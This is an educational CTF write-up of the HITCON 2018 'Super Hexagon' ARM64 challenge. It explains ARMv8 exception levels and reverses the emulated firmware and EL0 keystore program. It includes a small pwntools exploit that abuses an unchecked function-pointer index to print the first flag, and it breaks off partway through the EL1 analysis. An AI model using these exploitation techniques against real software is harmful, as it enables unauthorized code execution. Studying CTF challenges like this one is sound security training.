This post is an educational rewrite of Grant Hernandez’s excellent write-up of HITCON18 CTF Super Hexagon1.

I will try to detail every step of the way and find alternative solutions to the challenges to further educate my self in ARM/aarch64 kernel exploitation.

Download Super Hexagon challenge


Introduction

ARMv8 execution states

ARM announced in October 20112 a fundamental change to the ARM architecture; ARMv8-A profile (often called ARMv8 while the ARMv8-R profile is also available). ARMv8-A broadened the ARM architecture to embrace 64-bit processing and extended the virtual addressing to 64 bits.

The ARMv8 architecture consists of two main execution states, AArch64 (also referred as arm643) and AArch32 (arm32). The AArch64 execution state introduces a new instruction set, A64 for 64-bit processing. The AArch32 state supports the existing ARM instruction set.

From the programmer’s perspective the differences between AArch64 and AArch32 are all instructions are fixed to 32 bits, with the 16-bit Thumb model completely removed. Instead of 16 general purpose registers, AArch64 has 31 general purpose (64 bits wide) registers4.

From the systems programmer perspective, the privilege model has been simplified to Exception Levels (EL). There are four numbered exception levels, from least to most privileged: EL0, EL1, EL2, and EL35.

  • EL0 is the User mode for unprivileged execution.
  • EL1 is the Supervisor (kernel) mode and associated functions that are typically described as privileged.
  • EL2 is the Hypervisor mode.
  • EL3 is the trusted firmware or secure monitor.

Depending on the system configuration or platform, these may differ slightly, but for the Super Hexagon challenge, they are standard.

Each exception level, except EL2, has a Secure or Non-Secure mode. This is the basis of ARM TrustZone and has been for over a decade. Assuming a single processor core, it can only be executing in one mode or another. ELs and secure versus non-secure modes are changed through interrupts. These can occur asynchronously from the CPU, usually from a peripheral or timer, or synchronously from an instruction trap.

These traps are caused by the instructions:

  • svc: Supervisor Call causes an exception to EL1. It provides a mechanism for unprivileged software to make a system call to an operating system. See C6.2.294 in ARMv8 reference manual6.
  • hvc: Hypervisor Call causes an exception to EL2. Non-secure software executing at EL1 can use this instruction to call the hypervisor to request a service. HVC is UNDEFINED if the processor is in Secure state, or in User mode in Non-secure state. See C6.2.85 in ARMv8 reference manual6.
  • smc: Secure Monitor Call causes an exception to EL3. SMC is available only for software executing at EL1 or higher. It is UNDEFINED in EL0. See C6.2.227 in ARMv8 reference manual6.
Figure 1: ARMv8-A exception level security model summarised. © Grant Hernandez [1]

Exception handling

When an exception occurs, the processor must execute handler code which corresponds to the exception. The location in memory where the handler is stored is called the exception vector. In the ARM architecture, exception vectors are stored in a table, called the exception vector table. Each Exception Level has its own vector table, that is, there is one for each of EL3, EL2 and EL1. The table contains instructions to be executed, rather than a set of addresses. Vectors for individual exceptions are located at fixed offsets from the beginning of the table.

The virtual address of each table base is set by the Vector Based Address Registers VBAR_EL3, VBAR_EL2 and VBAR_EL1. VBAR_ELn is a system register. So it cannot be accessed directly. Special system instructions msr and mrs should be used manipulate system registers.

The exception-handlers reside in a continuous memory and each vector spans up to 32 instructions long. Based on type of the exception, the execution will start from an instruction in a particular offset from the base address VBAR_EL1. Below is the ARM64 vector table. For example when a synchronous exception is set from EL0 is set, the handler at VBAR_EL1 +0x400 will execute to handle the exception.

Linux defines the vector table at arch/arm64/kernel/entry.S and loads the vector table into VBAR_EL1 in arch/arm64/kernel/head.S.

Offset from VBAR_EL1 Exception type Exception set level
+0x000 Synchronous Current EL with SP0
+0x080 IRQ/vIRQ  
+0x100 FIQ/vFIQ  
+0x180 SError/vSError  
+0x200 Synchronous Current EL with SPx
+0x280 IRQ/vIRQ  
+0x300 FIQ/vFIQ  
+0x380 SError/vSError  
+0x400 Synchronous Lower EL using ARM64
+0x480 IRQ/vIRQ  
+0x500 FIQ/vFIQ  
+0x580 SError/vSError  
+0x600 Synchronous Lower EL using ARM32
+0x680 IRQ/vIRQ  
+0x700 FIQ/vFIQ  
+0x780 SError/vSError  

QEMU runtime emulation

Different modes of operation can be used be qemu:

  1. User mode only where system calls are emulated by QEMU and no kernel is required.
  2. Kernel mode where a guest architecture kernel is required, but QEMU provides the initial BIOS setup routine.
  3. BIOS mode where the first instruction executed is up to the developer. Used in the Super Hexagon challenge.

By viewing the qemu.patch file, we understand the physical memory map definition of bios.bin.

35	+#define RAMLIMIT_GB 3
36	+#define RAMLIMIT_BYTES (RAMLIMIT_GB * 1024ULL * 1024 * 1024)
37	+static const MemMapEntry memmap[] = {
38	+    /* Space up to 0x8000000 is reserved for a boot ROM */
39	+    [VIRT_FLASH] =              {          0, 0x08000000 },
40	+    [VIRT_CPUPERIPHS] =         { 0x08000000, 0x00020000 },
41	+    [VIRT_UART] =               { 0x09000000, 0x00001000 },
42	+    [VIRT_SECURE_MEM] =         { 0x0e000000, 0x01000000 },
43	+    [VIRT_MEM] =                { 0x40000000, RAMLIMIT_BYTES },
44	+};
BOOT ROM (FLASH) PERIPHERALS 0x08000000 0x00000000 0x0801FFFF UART 0x09000000 0x09000FFF SECURE MEMORY 0x0E000000 0x0EFFFFFF NON-SECURE MEMORY 0x40000000 0xFFFFFFFF
Figure 2: The bios.bin file physical memory map visualized.

The emulated “hitcon” machine requires 3 GB of memory. The boot ROM flash, physical address 0x0 with size 0x08000000, is split in half to two parts. See line 172 and 173 below. The first part is allocated for secure mode and the second part is allocated for non-secure mode.

167	+    // prepare ram / rom
168	+    MemoryRegion *ram = g_new(MemoryRegion, 1);
169	+    memory_region_allocate_system_memory(ram, NULL, "mach-hitcon.ram", machine->ram_size);
170	+    memory_region_add_subregion(sysmem, memmap[VIRT_MEM].base, ram);
171	+
172	+    hwaddr flashsize = memmap[VIRT_FLASH].size / 2;
173	+    hwaddr flashbase = memmap[VIRT_FLASH].base;
174	+    create_one_flash("hitcon.flash0", flashbase, flashsize, bios_name, secure_sysmem);
175	+    create_one_flash("hitcon.flash1", flashbase + flashsize, flashsize, NULL, sysmem);
176	+
177	+    MemoryRegion *secram = g_new(MemoryRegion, 1);
178	+    hwaddr base = memmap[VIRT_SECURE_MEM].base;
179	+    hwaddr size = memmap[VIRT_SECURE_MEM].size;
180	+    memory_region_init_ram(secram, NULL, "hitcon.secure-ram", size, &error_fatal);
181	+    memory_region_add_subregion(secure_sysmem, base, secram);
...
192	+    bootinfo.loader_start = memmap[VIRT_MEM].base;

The machine starts at TBC

When executing qemu, the user is prompted with a trusted keystore application.

NOTICE:  UART console initialized
INFO:    MMU: Mapping 0 - 0x2844 (783)
INFO:    MMU: Mapping 0xe000000 - 0xe204000 (40000000000703)
INFO:    MMU: Mapping 0x9000000 - 0x9001000 (40000000000703)
NOTICE:  MMU enabled
NOTICE:  BL1: HIT-BOOT v1.0
INFO:    BL1: RAM 0xe000000 - 0xe204000
INFO:      SCTLR_EL3: 30c5083b
INFO:      SCR_EL3:   00000738
INFO:    Entry point address = 0x40100000
INFO:    SPSR = 0x3c9
VERBOSE: Argument #0 = 0x0
VERBOSE: Argument #1 = 0x0
VERBOSE: Argument #2 = 0x0
VERBOSE: Argument #3 = 0x0
NOTICE:  UART console initialized
[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000
[KERNEL] mmu enabled
INFO:      TEE PC: e400000
INFO:      TEE SPSR: 1d3
NOTICE:  TEE OS initialized
[KERNEL] Starting user program ...

=== Trusted Keystore ===

Command:
    0 - Load key
    1 - Save key

cmd> 1
index: 0
key: AAAAAAAAAAAAAAAAAAAAAAAAAAA
[0] <= AAAAAAAAAAAAAAAAAAAAAAAAAAA
cmd> 0
index:
[0] => aaaaaaaaaaaaaaaaaaaaaaaaaa
cmd>

EL0

Let’s begin reversing the bios.bin file, starting with a classic binwalk.

$ binwalk -e bios.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
143472        0x23070         SHA256 hash constants, little endian
770064        0xBC010         ELF, 64-bit LSB executable, version 1 (SYSV)
792178        0xC1672         Unix path: /lib/libc/aarch64
792711        0xC1887         Unix path: /lib/libc/aarch64
794111        0xC1DFF         Unix path: /lib/libc/aarch64
796256        0xC2660         Unix path: /home/seanwu/hitcon-ctf-2018

The file contains a ARM aarch64 ELF with DWARF debug information.

$ file _bios.bin.extracted/BC010.elf
BC010.elf: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, not stripped

When decompiling the BC010.elf main() function using Ghidra, it is clear that it contains the Trusted Keystore application.

int main(void) {
  int iVar1;

  intro();
  load_trustlet("HITCON",0x750);
  cmdtb[0] = cmd_load;
  cmdtb[1] = cmd_save;
  buf = (char *)mmap((void *)0x0,0x1000,3,0,0,-1);
  iVar1 = 0;
  while (iVar1 < 10) {
    run();
    iVar1 = iVar1 + 1;
  }
  return 0;
}

void run(void) {
  size_t sVar1;
  int len;
  int idx;
  int cmd;

  printf("cmd> ");
  scanf("%d",&cmd);
  printf("index: ");
  scanf("%d",&idx);
  if (cmd == 1) {
    printf("key: ");
    scanf("%s",buf);
    sVar1 = strlen(buf);
    len = (int)sVar1;
  }
  else {
    len = 0;
  }
  (*cmdtb[(longlong)cmd])(buf,idx,len); // <-- Owned by attacker
  return;
}

Where cmd, buf, idx and len is owned by the attacker, thus arbitrary code execution can be achieved by function pointers in the global buffer cmdtb (allocated at 0x00412750).

//
// .bss
// SHT_NOBITS  [0x412650 - 0x412777]
// ram: 00412650-00412777
//
__bss_start__                                   XREF[5]:     Entry Point(*), 00400088(*),
__bss_start                                                  scanf:0040197c(*),
_edata                                                       scanf:0040199c(*),
input                                                        _elfSectionHeaders::000000d0(*)  
00412650                 char[256]                                                   main.c:13
cmdtb[1]                                        XREF[3,1]:   Entry Point(*), run:0040057c(R),
cmdtb                                                        main:00400600(W),
                                                             main:0040060c(W)  
00412750                 void cmd                                                    main.c:14
tci_handle                                      XREF[4]:     Entry Point(*),
                                                             load_trustlet:004001e4(W),
                                                             load_key:00400320(R),
                                                             save_key:0040048c(R)  
00412760                 uint       ??                                               main.c:24
00412764                 ??         ??
00412765                 ??         ??
00412766                 ??         ??
00412767                 ??         ??
buf                                             XREF[5]:     Entry Point(*), run:00400588(R),
                                                             run:004005ac(R), run:004005bc(R),
                                                             main:00400630(W)  
00412768                 char *     NaP                                              main.c:15
tci_buf                                         XREF[10]:    Entry Point(*),
                                                             load_trustlet:004001dc(W),
                                                             load_key:00400308(R),
                                                             load_key:00400314(R),
                                                             load_key:00400328(R),
                                                             load_key:00400378(R),
                                                             save_key:00400424(R),
                                                             save_key:00400430(R),
                                                             save_key:00400438(R),
                                                             save_key:00400498(R)  
00412770                 TCI *      NaP                                              main.c:23

Where the input char[256] buffer is allocated at 0x00412650. The input buffer is used in the customized scanf().

int scanf(char *fmt,...) {
  int iVar1;
  ...
  gets(input);
  ...
  iVar1 = vsscanf(input,fmt,(__va_list *)&local_100);
  return iVar1;
}

Notice the usage of the insecure function gets().

#!/usr/bin/env python
from pwn import *
context.arch = 'aarch64' # requires `aarch64-linux-gnu-as'

print_flag = p64(0x400104) # ulonglong print_flag (void)

def do_EL0(p):
    p.sendline('-32') # Move `cmdtb` -32 * 8 bytes to the beginning of `input`
    p.sendline(print_flag) # Send `print_flag` to the beginning of `input`
    print(p.recvline()[8:])

if __name__ == "__main__":
    p = remote('localhost', 6666)

    p.recvuntil('cmd>')
    print("[+] Got banner")

    do_EL0(p)

Result:

$ ./el0.py
[+] Opening connection to localhost on port 6666: Done
[+] Got banner
Flag (EL0): hitcon{this is flag 1 for EL0}

[*] Closed connection to localhost port 6666

Now it is necessary to achieve arbitrary code execution.

The memory mapped page used for the global buf is our target for shellcode to achieve arbitrary code execution. However it is mapped with PROT_READ | PROT_WRITE = 3, and not PROT_EXEC. To get the returned address of mmap used for buf, I put a breakpoint at 0x40062c and read x0 register.

syscall x8 x0 x1 x2 x3 x4 x5
exit 0x5d int __status            
write 0x40 int __fd void * __buf size_t __nbytes      
read 0x3f int __fd void * __buf size_t __nbytes      
mmap 0xde void *__addr size_t __len int __prot int __flags int __fd __off_t __offset
mprotect 0xe2 void *__addr size_t __len int __prot      
gef➤  b *0x40062c
gef➤  c
Continuing.

Breakpoint 2, 0x000000000040062c in main () at bl33/user/main.c:149
149	in bl33/user/main.c
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$x0  : 0x00007ffeffffd000  →  0x0000000000000000  →  0x0000000000000000

The buf is always allocated at 0x00007ffeffffd000 due to the lack of ASLR. To change the memory protection of buf, mprotect() may be called.

When calling mprotect() with prot = RWX, the virtual machine throws an error: ‘ERROR: [VMM] RWX pages are not allowed’.

EL1

The pseudo code below display the EL3 monitor setup, and copies four memory segments to different destination addresses. Reversing the entry point (address 0x0) of bios.bin

00000008    SCTLR_EL3(0x30c50830)   (System Control Register (EL3))
00000014    VBAR_EL3(0x2000)        (Vector Base Address Register (EL3))
00000028    SCTLR_EL3(0x30c5183a)   (System Control Register (EL3))
00000034    SCR_EL3(0x238)          (Secure Configuration Register)
00000040    MDCR_EL3(0x18000)       (Monitor Debug Configuration Register (EL3))
0000004C    CPTR_EL3(0x0)           (Architectural Feature Trap Register (EL3))
# char *memclr (char *str1, int count)
00000058    memclr(0xe002000, 0x202000)
# char *memcpy (char *dest, char *src, int count)
00000068    memcpy(0xe000000, 0x2850, 0x68)
00000078    memcpy(0x40100000, 0x10000, 0x10000)
00000088    memcpy(0xe400000, 0x20000, 0x90000)
00000098    memcpy(0x40000000, 0xb0000, 0x10000)

The memcpy() memory segments is extracted by following script.

#!/bin/bash

dd if=bios.bin of=_mem_0x2850  bs=1 skip=0x2850  count=0x68
dd if=bios.bin of=_el2_0x10000 bs=1 skip=0x10000 count=0x10000 # (65KB)
dd if=bios.bin of=_mem_0x20000 bs=1 skip=0x20000 count=0x90000 # (589KB)
dd if=bios.bin of=_el1_0xb0000 bs=1 skip=0xb0000 count=0x10000 # (65KB)
  1. Offset 0x2850 do not disassemble to aarch64 instructions.
  2. Offset 0x10000 disassemble and appears to be EL2 kernel.
  3. Offset 0x20000 do not disassemble to aarch64 instructions.
  4. Offset 0xB0000 disassemble and appears to be EL1 kernel.
00010000         adr        x0, #0x11800  ; DATA XREF=EntryPoint+112, EntryPoint+116, EntryPoint+148
00010004         msr        vbar_el2, x0
00010008         isb
0001000c         ldr        x0, =0x40105000
00010010         ldr        x1, =0xd000
00010014         bl         sub_10858+8
00010018         msr        spsel, #0x0
0001001c         ldr        x0, =0x40104040
00010020         mov        sp, x0
00010024         bl         sub_282c+55332
000b0000         adr        x0, #0xb1000 ; DATA XREF=EntryPoint+144, qword_110, sub_b8930+20
000b0004         msr        ttbr0_el1, x0
000b0008         adr        x0, #0xb4000
000b000c         msr        ttbr1_el1, x0
000b0010         movz       x0, #0x10
000b0014         movk       x0, #0x8010, lsl #16
000b0018         movk       x0, #0x60, lsl #32
000b001c         msr        tcr_el1, x0
000b0020         isb
000b0024         mrs        x0, sctlr_el1
000b0028         orr        x0, x0, #0x1
000b002c         msr        sctlr_el1, x0
000b0030         isb
000b0034         orr        x0, xzr, #0xffffffffc0000000 <-- EL1 base address
000b0038         adr        x1, #0xb8000
000b003c         add        x0, x0, x1
000b0040         br         x0

By reversing the bios setup process using following commands, I can conclude that the EL1 virtual base address is 0xffffffffc0000000 and entry point 0xffffffffc0008000. Given that information I import the _el1_0xb0000 file into Hopper disassembler.

$ gdb-multiarch _bios.bin.extracted/BC010.elf
gef➤  set arch aarch64
The target architecture is assumed to be aarch64
gef➤  target remote localhost:1234
Remote debugging using localhost:1234

Stepping through the process to address 0xffffffffc0008004 gives VBAR_EL1(0xffffffffc000a000).

if (x8 == 0x40) {
  local_x20_160 = 0;
  while (_return_value = x0, local_x20_160 < x0) {
    do_write((uint)*(byte *)(local_x20_160 + x1));
    local_x20_160 = local_x20_160 + 1;
  }
}
References
  1. https://hernan.de/blog/2018/10/30/super-hexagon-a-journey-from-el0-to-s-el3 

  2. https://web.archive.org/web/20111122083000/https://www.arm.com/about/newsroom/arm-discloses-technical-details-of-the-next-version-of-the-arm-architecture.php 

  3. https://www.phoronix.com/scan.php?page=news_item&px=MTY5ODk 

  4. https://static.docs.arm.com/100878/0100/fundamentals_of_armv8_a_100878_0100_en.pdf?_ga=2.35770848.1593680955.1562538645-1678148931.1562001271 

  5. https://www.arm.com/files/downloads/ARMv8_Architecture.pdf 

  6. https://developer.arm.com/docs/ddi0487/latest/arm-architecture-reference-manual-armv8-for-armv8-a-architecture-profile  2 3